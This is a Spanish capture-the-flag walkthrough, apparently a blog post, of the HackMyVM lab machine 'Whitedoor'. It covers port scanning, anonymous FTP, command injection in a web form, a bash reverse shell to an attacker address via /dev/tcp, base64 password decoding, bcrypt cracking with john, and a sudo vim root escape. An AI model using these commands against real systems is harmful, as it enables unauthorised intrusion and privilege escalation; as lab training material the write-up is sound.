Whitedoor

Hoy regresamos con otra máquina easy de HackMyVM creada por Pylon, donde hay una web que nos permitirá ejecutar comandos para conseguir un RCE.

Reconocimiento de Puertos

Como siempre, empezaremos realizando el reconocimiento de puertos con un pequeño script que creé para automatizar este proceso inicial:

sudo nmapauto

 [*] La IP de la máquina víctima es 192.168.1.28

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 19:00 CET
Initiating ARP Ping Scan at 19:00
Scanning 192.168.1.28 [1 port]
Completed ARP Ping Scan at 19:00, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:00
Scanning 192.168.1.28 [65535 ports]
Discovered open port 80/tcp on 192.168.1.28
Discovered open port 21/tcp on 192.168.1.28
Discovered open port 22/tcp on 192.168.1.28
Completed SYN Stealth Scan at 19:00, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.1.28
Host is up, received arp-response (0.00036s latency).
Scanned at 2024-01-15 19:00:09 CET for 2s
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:EF:A2:E7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

 [*] Escaneo avanzado de servicios

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 19:00 CET
Nmap scan report for 192.168.1.28
Host is up (0.00018s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              13 Nov 16 22:40 README.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 3d:85:a2:89:a9:c5:45:d0:1f:ed:3f:45:87:9d:71:a6 (ECDSA)
|_  256 07:e8:c5:28:5e:84:a7:b6:bb:d5:1d:2f:d8:92:6b:a6 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Home
|_http-server-header: Apache/2.4.57 (Debian)
MAC Address: 08:00:27:EF:A2:E7 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds

 [*] Escaneo completado, se ha generado el fichero InfoPuertos 

Vamos en primer lugar a revisar el puerto 21, ya que tenemos acceso anonymous:

ip=192.168.1.28
❯ ftp $ip
Connected to 192.168.1.28.
220 (vsFTPd 3.0.3)
Name (192.168.1.28:kaian): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35116|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              13 Nov 16 22:40 README.txt
226 Directory send OK.
ftp> get README.txt
local: README.txt remote: README.txt
229 Entering Extended Passive Mode (|||22655|)
150 Opening BINARY mode data connection for README.txt (13 bytes).
100% |********************************************************************************************************************************************|    13       52.89 KiB/s    00:00 ETA
226 Transfer complete.
13 bytes received in 00:00 (25.39 KiB/s)
ftp> exit
221 Goodbye.
❯ cat README.txt
¡Good luck!

En este caso, como podemos observar solo vemos un fichero, el cual nos desea buena suerte.

Si revisamos el puerto 80:

Parece que solo nos deja usar “ls”:

Revisemos ese fichero php sospechoso:

Reverse shell

Quería puntualizar que en el propio index, podemos ejecutar otros comandos utilizando la “trampa” para separar múltiples comandos en una sola línea, utilizando “;”. De forma que podríamos poner “ls; id” y se interpretarían correctamente ambos comandos.

Aquí sí nos permite usar cualquier comando, así que de esta forma, nos ponemos como siempre a la escucha con:

nc -nlvp 1243

y tratamos de entablar una reverse shell introduciendo en la caja del navegador:

bash -c "/bin/bash -i >& /dev/tcp/192.168.1.150/1234 0>&1"

Tras esto conseguimos el RCE y acto seguido realizamos el tratamiento de la TTY.

Ahora nos vamos directamente a /home y revisamos qué directorios de trabajo y permisos tenemos:

www-data@whitedoor:/home$ ls -la
total 16
drwxr-xr-x  4 root       root       4096 Nov 16 16:58 .
drwxr-xr-x 18 root       root       4096 Nov 15 23:05 ..
drwxr-x---  9 Gonzalo    whiteshell 4096 Nov 17 18:11 Gonzalo
drwxr-xr-x  9 whiteshell whiteshell 4096 Nov 17 18:47 whiteshell

Como en Gonzalo no tenemos permisos, vamos a revisar whiteshell:

www-data@whitedoor:/home$ cd whiteshell/
www-data@whitedoor:/home/whiteshell$ ls -laR
.:
total 48
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 .
drwxr-xr-x 4 root       root       4096 Nov 16 16:58 ..
lrwxrwxrwx 1 root       root          9 Nov 16 00:43 .bash_history -> /dev/null
-rw-r--r-- 1 whiteshell whiteshell  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 whiteshell whiteshell 3526 Apr 23  2023 .bashrc
drwxr-xr-x 3 whiteshell whiteshell 4096 Nov 16 17:05 .local
-rw-r--r-- 1 whiteshell whiteshell  807 Apr 23  2023 .profile
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 18:43 Desktop
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 Documents
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 Downloads
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 Music
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 Pictures
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 Public

./.local:
total 12
drwxr-xr-x 3 whiteshell whiteshell 4096 Nov 16 17:05 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..
drwx------ 3 whiteshell whiteshell 4096 Nov 16 17:05 share
ls: cannot open directory './.local/share': Permission denied

./Desktop:
total 12
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 18:43 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..
-r--r--r-- 1 whiteshell whiteshell   56 Nov 16 09:07 .my_secret_password.txt

./Documents:
total 8
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..

./Downloads:
total 8
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..

./Music:
total 8
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..

./Pictures:
total 8
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..

./Public:
total 8
drwxr-xr-x 2 whiteshell whiteshell 4096 Nov 16 17:08 .
drwxr-xr-x 9 whiteshell whiteshell 4096 Nov 17 18:47 ..

Hemos descubierto un fichero oculto que parece interesante:

www-data@whitedoor:/home/whiteshell$ cat Desktop/.my_secret_password.txt
whiteshell:VkdneGMwbHpWR2d6VURSelUzZFBja1JpYkdGak5Rbz0K

Parece que está en base64, vamos a decodificarlo:

echo "VkdneGMwbHpWR2d6VURSelUzZFBja1JpYkdGak5Rbz0K" | base64 -d
VGgxc0lzVGgzUDRzU3dPckRibGFjNQo=echo "VGgxc0lzVGgzUDRzU3dPckRibGFjNQo=" | base64 -d
Th******************5

Bien, parece que ya podemos pivotar al usuario whiteshell, de esta forma, ahora ya podemos revisar el directorio de Gonzalo porque teníamos permisos de grupo:

www-data@whitedoor:/home/whiteshell$ su whiteshell
Password: 
whiteshell@whitedoor:~$ cd ../Gonzalo/
whiteshell@whitedoor:/home/Gonzalo$ ls -laR
.:
total 52
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 .
drwxr-xr-x 4 root    root       4096 Nov 16 16:58 ..
-rw------- 1 Gonzalo Gonzalo     718 Nov 17 20:06 .bash_history
-rw-r--r-- 1 Gonzalo Gonzalo     220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 Gonzalo Gonzalo    3526 Apr 23  2023 .bashrc
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 19:26 Desktop
drwxr-xr-x 2 root    Gonzalo    4096 Nov 16 21:04 Documents
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:09 Downloads
drwxr-xr-x 3 Gonzalo Gonzalo    4096 Nov 16 17:03 .local
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:11 Music
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:07 Pictures
-rw-r--r-- 1 Gonzalo Gonzalo     807 Apr 23  2023 .profile
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:09 Public

./Desktop:
total 16
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 19:26 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..
-r--r--r-- 1 root    root         61 Nov 16 20:49 .my_secret_hash
-rw-r----- 1 root    Gonzalo      20 Nov 16 21:54 user.txt

./Documents:
total 8
drwxr-xr-x 2 root    Gonzalo    4096 Nov 16 21:04 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..

./Downloads:
total 8
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:09 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..

./.local:
total 12
drwxr-xr-x 3 Gonzalo Gonzalo    4096 Nov 16 17:03 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..
drwx------ 3 Gonzalo Gonzalo    4096 Nov 16 17:03 share
ls: cannot open directory './.local/share': Permission denied

./Music:
total 8
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:11 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..

./Pictures:
total 8
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:07 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..

./Public:
total 8
drwxr-xr-x 2 root    Gonzalo    4096 Nov 17 18:09 .
drwxr-x--- 9 Gonzalo whiteshell 4096 Nov 17 18:11 ..

Hemos localizado 2 ficheros en “Desktop”, pero todavía no podemos leer la flag:

whiteshell@whitedoor:/home/Gonzalo$ cd Desktop/
whiteshell@whitedoor:/home/Gonzalo/Desktop$ cat .my_secret_hash 
$2y$10$CqtC7h0oOG5sir4oUFxkGuKzS561UFos6F7hL31Waj/Y48ZlAbQF6

Crackeando hash

Parece que hemos localizado un hash, vamos a tratar de crackearlo en la máquina atacante:

Copiamos el hash en un fichero llamado “hash” y usamos john:

❯ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
q********p       (?)     
1g 0:00:00:01 DONE (2024-01-15 20:26) 0.8000g/s 302.4p/s 302.4c/s 302.4C/s strawberry..metallica
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Parece que ya tenemos la contraseña de Gonzalo, así que vamos a por la flag de user:

whiteshell@whitedoor:/home/Gonzalo/Desktop$ su Gonzalo 
Password: 
Gonzalo@whitedoor:~/Desktop$ cat user.txt 
Y0*************g!!

Escalada de privilegios

Ahora vamos ya a por la de root, así que vamos a revisar los comandos que podemos ejecutar como otros usuarios:

Gonzalo@whitedoor:~/Desktop$ sudo -l
Matching Defaults entries for Gonzalo on whitedoor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User Gonzalo may run the following commands on whitedoor:
    (ALL : ALL) NOPASSWD: /usr/bin/vim

Podemos usar vim como root, así que si nos vamos a junto nuestro gran amigo https://gtfobins.github.io/gtfobins/vim/#sudo para poder escalar privilegios fácilmente:

Gonzalo@whitedoor:~/Desktop$ sudo vim -c ':!/bin/bash'

root@whitedoor:/home/Gonzalo/Desktop# whoami
root
root@whitedoor:/home/Gonzalo/Desktop# cd /root
root@whitedoor:~# ls
root.txt
root@whitedoor:~# cat root.txt 
Y0******************T!!

Con esto finalizamos la máquina, agradecer a Pylon por la misma. Nos vemos en la siguiente.